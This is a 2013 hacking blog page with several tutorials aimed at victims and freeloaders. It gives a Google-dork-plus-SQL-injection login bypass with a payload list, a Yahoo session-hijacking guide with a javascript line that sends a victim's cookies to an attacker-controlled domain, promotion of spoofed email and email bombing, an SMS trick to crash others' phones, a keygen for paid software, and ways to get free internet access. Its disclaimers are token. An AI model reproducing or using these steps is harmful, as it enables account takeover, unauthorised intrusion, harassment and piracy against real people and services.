Tuesday, 27 August 2013

FREE BROWSING ON PC, FOR ALL NETWORKS



FREE BROWSING ON PC, FOR ALL NETWORKS




Before you need to download your-freedom software on your PC 

                                          Click Here To Download


Lets us start the tutorials . . . 

Goto your-freedom and register a free account with them, then configure it with below:

click on configure: enter the following settings :-

YF server: ems12.your-freedom.de

connection mode: HTTPS
port:443
tweak: none 
minimum buffer: 1500
reconnection delay: 5000
initial post size: 20000
FTP mode: both
then click on the account information: enter your username and password, click on 'AVE and EXIT ans you're good to go!.





change your proxy to 
IP: 127.0.0.1
port:8080
use same proxy for all protocol

connect your modem ( or phone modem) and click on 'Start connection in your freedom software.

if your want high speed browsing with unlimited connection time , you need to upgrade your account to basic account . . .

1 month-=1,500
2 month =-4,500




note***** make sure you click on start connection immediately you connect your modem, else it may not connect****

HACK WEBSITE ADMIN USING SQL INJECTION


First open http://www.google.com 
write in the google search bar "Admin.asp and then press the search tab.
now a number of website opened with admin log page. 
now click on target website means click on the website you want to hack. Then a page with username and password has been opened 
e.g: welcome to adminxxxx

username=admin.
now the part password if is made on sql then the password is: 1'or'1'=1 
actually it is sql injection which breaks the server firefall. 

here are the list of common sql injections below:

'1'=1

'0"=0

"a"="a"

('x=x"

1=1--

0=0#

') or a"='a

hi" or 1'=1"

****note*** this tricks is for educational purpose ******

Send , identify , trace Fake/Spoofed Email | Email Bombing | Email Spamming



Basics of working of Email

Email stands for Electronic Mail. 
Email sending and receiving is controlled by the Email servers.Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally.Users from across the world register in to these Email servers and setup an Email account.


Email Travelling Path :-

Let’s say we have two Email providers, one is gmail.com and other is yahoo.com, 
ABC is a registered user in gmail.com and XYZ is a registered user in yahoo.com.

• ABC signs in to his Email account in gmail.com, he then writes a mail to the xyz@yahoo.com and sends the message.


• But what happens behind the curtains, the Email from the computer of abc@gmail.com is forwarded to the Email server of gmail.com. Server of gmail.com then looks for yahoo.com on the internet and forwards the Email of the yahoo.com for the account of XYZ@yahoo.com. Yahoo server puts that email in that account.


• XYZ then sits on computer and signs in to her Email account.Now she has the message in her Email inbox.





Sending Fake/spoofed Email -:  

Fake or spoofed email means the email from any email ID. 
It doesn't matter whether the sender's email really exists or not. 
Sender's email ID can be anything@anything.com. 

DISCLAIMER :- Know Hacking but No Hacking 
Warning : Gaining unauthorized access over websites,systems or email accounts, spying on computers in an unethical manner, identity theft, intellectual property theft , black hat hacking are serious crimes.Iam not responsible for any of such kind of illegal activities performed by learners or readers.

Method :-

Using Websites : There are numberless websites that provide free service to send fake emails. But the problem is that they attach the advertisements along with your email.  But the best , I have found that do not attach the advertisements.

Click Here To Visit   {have some advance options}



What is Email Spamming and Email Bombing ?

Email Bombing as clear from the name is sending the mass emails that is large number of emails to a email ID in a single click.


Email spamming is like sending an email to large number of email IDs in a single click. 

These activties are performed mainly for the advertisements of the products or services provided by a company. Many spammers spam to collect individual's personal information through some stupid things like 'fill these details to get your lottery amount' and that information is sold to businessmen looking for the people of different categories. There could be many more reasons of spamming. Spammers use automated tools to collect as many emails available on websites,forms,chat rooms and send spams to them. 

How to identify whether an email is real or spoofed ?

It can be done by checking headers. Email headers is simply the text which contains the information about the mail servers that the email encountered in its path from the sender to receiver. It contains a lot of other information too.


Note: I am just telling you a few points about this so that you would just get an idea about the approach. This may or may not depend on some factors.

We can view email headers in gmail by clicking at 'show original', in yahoo by clicking at 'Full headers' and such kinds of options in other email service providers.


If  you get an email displaying sender's email like someone@gmail.com, someone@hotmail.com, someone@yahoo.com . Then it should be originated from gmail,hotmail and yahoo servers respectively. 
But if it doesn't, the most probably the email would be fake.  



I will show you by an example, I received three emails in my gmail inbox from sender's address "someone@gmail.com."  Sender's address shows me that they should have been originated from gmail/google server, if they would be real.

Note : There is a field called "Return-path" in headers.  If the email ID shown in this field and email ID you get as sender's email ID doesn't match, then the email is surely fake.







Can we get sender's IP address from Email Headers ?
 

We may or may not. Gmail, yahoo normally do not reveal sender's IP address. But when we send an email from a php script,  the headers might reveal Sender's IP. The conclusion is that answer to this question varies from different email service providers and the way how email is sent.


Can we trace sender's location, 
if we get his IP address ?

The IP address could only tell that which Internet Service Provider (ISP) is used by sender. Further details can not be revealed without the help of that ISP. Normally the Public IP is dynamic that is it keeps changing. We need to ask ISP about the user who was assigned that IP at the time email was sent. If sender has purchased a static IP address, it doesn't matter that when exactly was email sent. He could easily be traced

hack yahoo id by session cookies
What are session IDs or session cookies ?

Iam Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. 

Type in browser javascript:alert(document.cookie);(This Java Script works only in Internet Explorer) You would get a pop up box showing you the cookies. 
Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .


Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies. 

An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesn't get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs. 



Requirement :- Yahoo Cookie Stealer

             Click Here To Download 


Tutorial to steal session IDs :-

1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. 

     Upload the four files that you have just downloaded.
     Make a new directory 'cookies' here.



3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account.

Code :- javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 

Stolen cookies get stored in directory 'cookies' 

4. Open the hacked.php . The password is 'hackerszone'. 



You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.


Now it doesn't matter if victim signs out from his account, you would remain logged into it.





Detect Invisible Users In Yahoo Messanger So your Friends Cant Fool You.

Most of the time it happens That your friends make offline only for You in Yahoo...So that You will see him/her as offline and cannot chat .

Many of my friends ask me how to check if the yahoo user is offline or online...

So here are the top best websites which will show you if your friends are online OR offline

CLICK HERE TO VISIT 

CLICK HERE TO VISIT 

Secure YourSelf from Keylogger Using KeyScrambler Premium and Full

Secure YourSelf from Keylogger Using KeyScrambler Premium and Full

A safe journey online begins with Key Scrambler.


Key Scrambler Premium - Actively Guards Data Transmitted over the Internet.

When you try do something online, for example access your checking account on your bank's website, your keystrokes will travel along a path in the operating system to reach the destination application. 
Many places along this path, malware(keyloggers and Rats or simply keyboard hookers) can be physically or remotely installed by hackers to log your keystrokes so they can steal your user name and password and this is really a very dangerous threat.

Key Scrambler secures your keystroke data through the crucial path 

How does key Scrambler Work? 

Actually any key scrambler works in three basic steps namely:  
Encrypt Keys 
Bypass Malwares like keyloggers, rats or  
keyboard API hook programs and 
at last decrypt keys. 

I have explained the steps in detail below:

1. As you're typing on the keyboard, Key Scrambler is simultaneously encrypting your keystrokes at the keyboard driver level. Because Key Scrambler is located in the kernel, deep in the operating system, it is difficult for keyloggers to bypass the encryption.

2. As the encrypted keystrokes travel along the crucial path, it doesn't matter if they get logged, or whether the keyloggers are known or brand new, because your keystrokes are completely indecipherable the whole time.

3. When the encrypted keystrokes finally arrive at the destination app, the decryption component of Key Scrambler goes to work, and you see exactly the keys you've typed.


There are lots of Blogs and Websites Offer you only the free version of Key Scrambler,
  
But i am Offering Key scrambler Premium version for you guys, as i always try to give HARD SECURITY for My Blog Members. 

As HackersZone is Specially for Hacking and Security Purposes. 


Well Now move on to Download and Installation part
Download Key Scrambler Premium Version From There Official Creators Website


CLICK HERE TO DOWNLOAD 

Click on the Above Link and then Click on Download Premium as shown in the below  Screen Shot



Download and Install The Key Scrambler 
After Installing Reboot your Computer 
Now Activate it.
Download and Run the Keygen 

CLICK HERE TO DOWNLOAD

Then Select Premium in Products option and then Copy the email add and paste in to the Registration window and click Generate .

That's Sit Now you have Latest and Full Version of Key Scrambler Premium.

Enjoy Hard Protection.

Proxies - Know and Use

Proxies - Know and Use

Lets start from general meaning of word 'proxy'. 
Its actually an agent/substitute or anybody acting at place of any other. 

Technically, proxies are used to bypass some firewall restrictions,  maintaining anonymity or for many other purposes. Like you must  using proxies for accessing social networking sites from your college network which your firewall restricts.

Lets understand the common methodology (talking in general terms)
You bunk the lecture, requests your friend to speak up your  attendance, you get the attendance (in case professor doesn't' detect).

Now talking technically , when college firewall doesn't allow you to connect to a site (say Facebook) You requests a proxy server to bring the web page from Facebook and serve  you, Now the firewall thinks you are dealing with a server other then Facebook and allows you to make a connection(in case firewall doesn't detect ).

Hence you have successfully managed to bypass a firewall. Proxy servers simply act as intermediate between your machine and actual server that you are accessing.



Proxy servers are mostly used to maintain anonymity. Suppose you are planning to commit an online crime,you can use proxy server. The actual web server doesn't come to know about you because proxy server is dealing with web server on your behalf.


Common ways to use proxies 

1) Setting in Web Browser 

Steps :-
1. First of all log on to whatismyip.com and pen down your current IP.


2. Logon to google.com and search for 'fresh proxies' You will get many sites providing you list of IPs and respective port numbers. 

It must be like this IP:port.

3. Now copy the IP and port no.


4. In Mozilla Firefox browser, go to Tools--Options--Advanced--Network--Settings . You will get the dialogbox as shown.





Check the option "Manual Proxy Configuration" , fill IP and port no. You can configure the proxies in any browser.

5. Check out whatismyip.com again , hopefully it mush have been changed. Similary you can configure proxies in other web browsers.



2) Using software's. 

You can download many IP hiding software's. There are easy to use and freely available on internet.They automatically keep changing your IP after a particular interval of time.  I would recommend you one that is Ultrasoft. 

Click Here To Get Ultrasurf


3. Using websites .

Many websites provide free services to hide you IP address.You can directly visit other websites through them.

Click Here To Visit Website 

Friday, 26 July 2013

EXCLUSIVE HACKING TOOLS.....

HOW TO SWITCH OFF MOBILE PHONE BY SMS

HOW TO SWITCH OFF MOBILE PHONE BY SMS (DONT MISUSE)


Do you want to switch off others mobile phone by SMS (Short Message Service)???
1) Take a multimedia phone,It is must because these types of phones will never off with this SMS
2) Then Go to Menu>>> Message >>> Write new message
3) Type 51 commas (for some of the phones or phone OS versions you need to use 79 commas instead of 51) [ ' ] like below(These are inverted commas)

In this trick, After sending this SMS, your friend will get your message usually..
He will Open your message. After the clicking message open button, your friend's phone must be switch off or restart. Some case , he can see main page of your message, but while he try to press any other button like 'down arrow' for further reading or to get sender details , he cant do that work. because his mobile phone must be switch off or restart.
You must care to sending SMS like this. because this type of activities is like to abusing him. That is illegal.
So take care..

Monday, 8 July 2013

EXCLUSIVE HACKING TOOLS.....

DOWNLOAD HERE


DOWNLOAD HERE

Twitter Delicious Facebook Digg Stumbleupon Favorites More